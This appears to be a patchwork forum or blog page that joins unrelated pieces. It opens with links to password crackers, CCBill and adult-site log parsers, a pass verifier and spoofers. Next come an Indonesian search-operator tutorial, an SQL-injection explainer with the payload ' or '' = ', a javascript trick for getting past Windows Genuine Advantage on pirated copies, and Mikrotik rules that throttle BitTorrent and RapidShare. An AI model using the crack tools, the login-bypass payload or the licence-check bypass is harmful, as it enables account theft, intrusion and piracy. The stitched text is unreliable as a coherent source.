Distributed John The Ripper by Luis Parravicini
Code:
http://ktulu.com.ar/en/djohn.php
Cain and Abel by Massimiliano Montoro
Code:
http://www.oxid.it/cain.html
Salt Grinder by Wolfman
Code:
http://wolfman.deny.de/SaltGrinder.php
Log Tools:
LogRip by Rhino -
Code:
http://rhino.deny.de/logrip.php
Azarius by Rhino -
Code:
http://rhino.deny.de/azarius.php
Zimapass Parser by Sentinel:
Code:
http://sentinel.deny.de/zimaparser.htm
*C-Parse (ccbill.log parser) by Sentinel:
Code:
http://sentinel.deny.de/c_parse.htm
CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:
http://membres.lycos.fr/ccbill/
Accessdiver/Ares Parser by Sentinel:
Code:
http://sentinel.deny.de/ad_ares_parser.htm
Spoofers:
Zspoof by wolfman -
Code:
http://wolfman.deny.de/tools.html
Sploof by Jean Fages -
Code:
http://www.accessdiver.com/sploof.htm
Final Spoof
Code:
http://www.beatharness.com/finalspoof/
Spooph by nast0
Code:
http://24.106.100.133/spooph/index.html
D-Spoof And Others (Russian Site, English Prog)
Code:
http://mspoofer.pisem.net/zaza/index.htm
Mikho's Online Spoofer (web based spoofer)
Code:
http://mikho.kicks-ass.net/spoofs/spoofs.hta
QuickSpoof
Code:
http://httpd.chello.nl/~m-koster2/spoofs.htm (http://httpd.chello.nl/%7Em-koster2/spoofs.htm)
Other Tools:
Scholar by Sentinel - (History checker)
Code:
http://sentinel.deny.de/scholar.htm
Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:
http://xtremet.deny.de/products.htm
ISS Storm:
http://24.161.50.41/Hacker%20Tools%20and%20Exploits (http://24.161.50.41/Hacker%20Tools%20and%20Exploits/)
Tehnik Search DI Internet
Mungkin seluruh atau sebagian dari kita selalu tergantung dengan search engine
untuk mendapatkan informasi, berita, software gratis dan lain sebagainya. Tapi
masih sangat sedikit yang mengerti searching yang baik. Ok kita mulai saja,
bahwa dalam searching kita mengenal beberapa search engine salah satunya Google.
Beberapa search engine mengenal karakter seperti +, - dan ". Tetapi masih banyak
yang belum tahu mengenai karakter tersebut. Saya akan menggunakan mode Tanya
jawab dalam menjelaskan hal tersebut.
Karakter Matematika.
# Tanda (+)
Ingin mencari artikel yang didalamnya terkandung kata hacking,security dan internet.
Anda dapat mengetikkan kata disearch engine : +hacking +security +internet Jika
terdapat artikel yang memuat salah satu atau dua kata tersebut diatas tidak akan
ditampilkan hanya artikel yang memuat tiga kata tersebut yang di tampilkan .
Tanda + dibaca oleh search engine sebagai DAN symbol ini dapat dipakai
sebanyak-banyaknya misalnya: +harga +komputer murah +untuk +wilayah +medan.
Dan sebagai nya.
# Tanda (-)
Ingin mencari artikel yang didalamnya terkiandung kata statistic penduduk sumatera
kecuali Medan.Ketik di search engine : +statistic +penduduk +sumatera -Medan. Search
engine yang bersangkutan akan mencari di internet artikel yan mengandung kata Statistik
penduduk sumatera tetapi tidak terdapat kata medan. Atau seperti ini +tempat +wisata
+bali -kuta. Maka search engine akan menampilkan artikel tentang tempat wisata di bali
dan pada artikel tersebut tidak terdapat kata kuta. Tanda - dibaca oleh search engine
sebagai KECUALI.
# Tanda (")
Ingin mencari artikel di internet yang didalamnya terdapat kata hacking dan security dan
kata tersebut tidak duipisah kan oleh kata-kata yang lain.
Ketik di search engine : "hacking dan security" maka search engine yang bersangkuta akan
mencari kata hacking dan security yang katanya tidak dipisah kan oleh kata-kata lain.
Apabila ada artikel yang mengandung kata hacking dan security yang katanya dipisah kan
oleh kata-kata lain maka artikel tersebut tidak ditampilkan oleh search engine yang
bersangkutan.
Dan anda dapat juga menggabungkan ketiga karakter tersebut tersebut seperti contoh
berikut ini: +kuliah +"ilmu komputer" -bayar
Search engine akan mencari artikel di internet yang terdapat kata kuliah ilmu komputer
kata ilmu komputer tidak akan dipisah kan oleh kata lain dan tidak akan menampilkan
artikel tersebut bila terdapat kata bayar. Perlu di ingat bahwa penggunaan spasi untuk
memisah kan antara kata-kata yang kita cari, spasi tersebut akaan dibaca ATAU contoh
Ketik di search engine : ilmu komputer
Maka search engine akan menampilkan web yang mengandung kata ilmu atau komputer atau
yang mengandung kata kedua-dua nya.
Simbol Bolean
Seperti yang kita ketahui symbol bolean adalah kata-kata OR, AND dan NOT. Kita dapat
menggunakan symbol tersebut dalam mencari informasi di internet.
# Bolean OR
Pada dasar nya symbol bolean OR sama seperti apabila kita menggunakan spasi contoh :
ilmu OR komputer
Search engine akan menampilkan web yang mengandung kata ilmu atau kata komputer atau
kedua-duanya.
# Bolean AND
Penggunaan bolean AND sama dengan karakter/tanda + Contioh : ilmu AND komputer
Search engine akan menampilkan web yang mengandung kata ilmu komputer apabila tidak
terdapat salah satu dari kata tersebut tidak akan di tampilkan.
# Bolean NOT
Penggunaan bolean NOT sama dengan tanda (- ) contoh saya akan mencari infor- masi tentang
statistic penduduk di sumater tetapi tidak termasuk medan.
Ketik di sdearch engine : Statistik AND penduduk AND sumater NOT medan search engine akan
menampilkan web yang berisi kata statistic penduduk sumatera tetapi tidak terdapat
kata medan.
# Bolean NEAR
Contoh : saya ingin mencari kata ilmu komputyeryang jarak antara kata tersebut berdekatan.
Ketik di search engine : ilmu NEAR komputer maka search engine akan menampilkan web yang
berisi kata ilmu komputer yang jarak antara kedua kata tersebut berdekatan.
Penggunaan Bolean tersebut diatas dapat juga digabungkan contoh Saya ingin mencari definisi
dari kata cinta atau kasih maka dapat di ketik di search engine : definisi AND (cinta OR kasih)
Search engine akan menampilkan web yang mengandung kata defini cinta atau definisi kasih.
Untuk contoh selanjut nya anda coba sendiri.
Penggunaan Host.
Pencarian informasi dapat juga dengan menggunakan kata Host, Contoh:
# Saya ingin mencari website ilmu komputer.com maka saya dapat mengetikkan di search engine
host: ilmukomputer.com
# Saya ingin mencari kata php di website ilmukomputer.com maka saya dapat mengetikkan
kata : php host: ilmukomputer.comatau host: ilmukomputer.com php.
# Saya ingin mencari kata pertahanan di situs-situs pemerintahan indonesiamaka saya dapat
mengitikkan di search engine: pertahanan host: go.id.
Symbol/karakter matematika dapat juga digabungkan dalam pencarian ini contoh:
Saya akan mencari kata pesawat tetapi bukan yang terdapat didalam website menristek.go.id
maka saya dapat mengetikkan di search engine : pesawat -host: menristek.go.id.
# Mencari informasi berdasarkan type file
Ada sebagian orang mencari informasi berdasrkan type file.
Contoh:
Saya ingin mencari artikel tentang hacking dan security dan artilkel tersebut harus dalam
format pdf. Dan saya dapat mengetikkan di search engine :
+hacking +security filetype: pdf
dan search engine akan menampilkan artikel tentang hacking dan security dengan format pdf
contoh lain :
saya ingin mencari artikel tentang ilmu komputer didalam website yang sufiksnya ac.id
artikel tersebut harus file bertype pdf maka saya dapat mengetikkan di search engine
+ilmu +komputer filetype:pdf host ac.id
# Mencari informasi berdasarkan judul situs
Kita juga dapat mencari situs web berdasarkan judulnya .
Contoh :
Ketik di search engine title:komputer
Maka search engine akan menampilkan situs yang mengandung judul komputer. sedangkan pada
search engine yahoo tidak mengenal kata TITLE tetapi hanya disingkat T.
# Mencari informasi berdasarkan URL
Pencarian dengan cara ini akan menampilkan URL yang diminta
Contoh :
inurl:komputer
Maka semua search akan menampilkan semua URL yang ada kata komputernya seperti
www.ilmukomputer.com/komputer dsb.
Contoh lainnya :
Php inurl:ilmukomputer.com maka search engine akan menampilkan seluruh artikel yang
mengandung kata php pada subdomain ilmu komputer.Dan pada google juga mengenal kata
allinurl tetapi pencarian ini hanya terbatas pada subdirectory, Sedangkan sampai ke
level file atau dengan kata lain inurl lebih dalam pencariannya tidah hanya terbatas
pada subdirectory.Dan yang perlu di ingat Tidak semua search engine mengenal
karakter matematika dan Bolean.
Tips: Bagi anda pengguna warnet ada baik nya anda mempersiapkan dari rumah apa yang
ingin anda cari, itu untuk menghemat waktu dan tentunya menghemat uang anda.8-|B-)
What is an SQL Injection Attack / Vulnerability?
A SQL injection vulnerability can occur when a poorly-written program uses user-provided data in a database query without first validating the input. This is most-often found within webpages with dynamic content. There are some excellent tutorials and descriptive articles on this subject, as well as many vulnerability postings for different applications from full-disclosure websites.
A simple example of SQL injection is a basic HTML form login in which you provide a username and password:
Given this snippet of HTML, one can deduce that the easiest (and worst) way for the script "process_login.php" to work would be for it to build and execute a database query that looks like this:
"SELECT id
FROM logins
WHERE username = '$username'
and password = '$password'";
Under those circumstances, if the variables "$username" and "$password" are taken directly from the user's input, the login script can easily be tricked into believing that a valid password has been provided by playing with the syntax of the SQL statement. Suppose the following string were provided as the password:
' or '' = '
and we gave "bob" as the username. Once the variables are interpolated, the query above would look like this:
"SELECT id
FROM logins
WHERE username = 'bob'
and password = '' or '' = ''";
This query will return a row because the final clause:
... or '' = ''
will always evaluate to true (an empty string is always equal to an empty string).
Cara update full WINDOWS bajakan
Kalian jgn senang doeloe.. Ternyata update itu baru sebagian keciL dr update yang ada di website update mereka.. Kalau kita validating windows kita dan dinilai windows asli sama microsoft, barulah dikatakan sama microsoft server nya bahwa anda berhak utk melakukan update secara menyeluruh..
Nah, gmana caranya membuat windows anda mendapatkan semua update terbaru tanpa ter-register?!
Cara nya sebenernya mudah saja, dan mgkn saja para ahli ahli javascript kita telah menemukan cara serupa juga.. Hehehe
Begini caranya ::
Pertama tama kamu ke start, dan ke all programs..
Lalu pilih yang paling atas "Microsoft Update"..
Nah nanti kan dia buka web seperti ini ::
http://update.microsoft.com/microsoftupdat...t.aspx?ln=en-us
Nah kalian tunggulan sampe loading nya selesai..
Nanti dia akan keluar 2 pilihan "express" dan "custome" --> Nah kalau kalian pilih salah satu dr itu.. Nantinya kalian akan mengalami validating chek version dan sebagainya.. Lalu kalau kalian bukan asli, kalian tetap akan diberikan access utk update, tapi DIKITTTTT bgt deh updatenya dibandingkan kalau asli..
Nah gmana caranya supaya kalian ter-deteksi sebagai asli?!
Mudah saja, sebelum anda meng-klik "express" dan "custome" tadi..
Silahkan ubah alamat website di address bar anda menjadi
javascript:void(window.g_sDissableWGACheck='all')
Lalu tekanlah enter, dan nanti web akan nge-blink sekali dan cepat..
Lalu silahkan pilih antara "express" atau "custome" --> Itu semua terserah anda..
Lalu anda akan mem-bypass the validating version of the microsfot..
Selamat Mencoba~
Ngeblok Koneksi Bit-Torrent Di Mikrotik
Sebenarnya cara ngeblok software download per-to-per ini sangat mudah dengan simple scripts yaitu
/ip firewall filter add chain=forward p2p=bit-torrent action=drop
Bisa di Cek deh Trafiknya.... :P
[admin@Cendekia] /queue simple> print
Flags: X - disabled, I - invalid, D - dynamic
0 name="P2P" dst-address=0.0.0.0/0 interface=ether4 parent=none
direction=both priority=8 queue=wireless-default/wireless-default
limit-at=1000000/64000 max-limit=1000000/64000
total-queue=default-small time=0s-1d,sun,mon,tue,wed,thu,fri,sat
p2p=all-p2p
Semoga Bermamfaat
Rate-limiting RapidShare - Mikrotik
Create an address list with all RapidShare networks (2008-12-03)
/ip firewall address-list
add address=62.140.31.0/24 list=RapidShare
add address=62.153.244.0/24 list=RapidShare
add address=62.67.46.0/24 list=RapidShare
add address=62.67.50.0/24 list=RapidShare
add address=62.67.57.0/24 list=RapidShare
add address=64.211.146.0/24 list=RapidShare
add address=64.214.225.0/24 list=RapidShare
add address=64.215.245.0/24 list=RapidShare
add address=80.152.62.0/24 list=RapidShare
add address=80.231.128.0/24 list=RapidShare
add address=80.231.24.0/24 list=RapidShare
add address=80.231.41.0/24 list=RapidShare
add address=80.231.56.0/24 list=RapidShare
add address=80.239.137.0/24 list=RapidShare
add address=80.239.151.0/24 list=RapidShare
add address=80.239.152.0/24 list=RapidShare
add address=80.239.159.0/24 list=RapidShare
add address=80.239.226.0/24 list=RapidShare
add address=80.239.236.0/24 list=RapidShare
add address=80.239.239.0/24 list=RapidShare
add address=82.129.33.0/24 list=RapidShare
add address=82.129.35.0/24 list=RapidShare
add address=82.129.36.0/24 list=RapidShare
add address=82.129.39.0/24 list=RapidShare
add address=195.122.131.0/24 list=RapidShare
add address=195.122.149.0/24 list=RapidShare
add address=195.122.151.0/24 list=RapidShare
add address=195.122.152.0/24 list=RapidShare
add address=195.122.153.0/24 list=RapidShare
add address=195.219.1.0/24 list=RapidShare
add address=206.57.14.0/24 list=RapidShare
add address=207.138.168.0/24 list=RapidShare
add address=208.48.186.0/24 list=RapidShare
add address=212.162.2.0/24 list=RapidShare
add address=212.162.63.0/24 list=RapidShare
add address=217.243.210.0/24 list=RapidShare
BTW: It was a quick and dirty awk hack with /24 only, but 195.122.152.0 could be added as /23 as well!
Now let's mark all traffic that matches the address list
/ip firewall mangle
add action=mark-connection chain=prerouting comment="Entire Traffic" \
disabled=no new-connection-mark="Entire Traffic" \
passthrough=yes
add action=mark-connection chain=prerouting \
comment="RapidShare Connections" connection-mark="Entire Traffic" \
disabled=no new-connection-mark="RapidShare Connections" \
passthrough=yes src-address-list=RapidShare
add action=mark-packet chain=prerouting comment="RapidShare Traffic" \
connection-mark="RapidShare Connections" disabled=no \
new-packet-mark="RapidShare Traffic" passthrough=no
This is the interessting part: Limit 'em *G* (in this case it's 1M)
/queue simple
add comment="RapidShare" direction=both disabled=no \
dst-address=0.0.0.0/0 interface=all limit-at=1000000/1000000 \
max-limit=1000000/1000000 name="RapidShare" \
packet-marks="RapidShare Traffic" parent=none priority=8 \
queue=default-small/default-small total-queue=default-small
